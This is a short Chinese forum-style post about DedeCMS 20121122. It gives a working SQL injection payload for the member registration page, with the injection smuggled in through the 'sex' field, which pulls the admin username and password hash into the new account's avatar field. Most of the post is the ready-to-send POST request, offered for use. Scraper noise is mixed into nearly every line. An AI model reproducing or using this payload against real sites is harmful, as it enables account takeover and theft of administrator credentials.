dedecms版本 20121122
0 X/ x$ r4 r1 k+ I1 o$ M) _$ o$ W
0 w# M% J0 }, E8 O( f% y; p- M f1 v需要magic_quotes_gpc=Off3 z1 _# T7 {9 d* H. U( g q
! x: U( ~, G. p) A应该是没有什么大危害的漏洞.7 u( g% l/ }7 a0 H9 D8 I: H V5 j
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
" F# X+ U" V4 [* E$ E+ I1 O6 C. F9 U
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.- L" w6 T2 f" C$ N. |
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
# i& W8 f+ ~% S! P- n8 X
8 g4 Q4 ]# J* H' L1 _" j" Phttp:///de/member/reg_new.php
5 J4 @7 I+ K+ I& m: M! `
: \" _7 l% r2 Z6 M) K) v mPOST
$ k4 g& x7 u( z1 l& N0 f" x! Q( t* H8 O t1 ~
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
6 x' }2 r- ?1 y& N. ^( Y2 _( Z$ t U$ A% C* Q) R: B
成功注册后,头像处里面有好玩的信息.% d1 B6 x1 a: }" _
p$ L( `$ G" V e6 c& }
|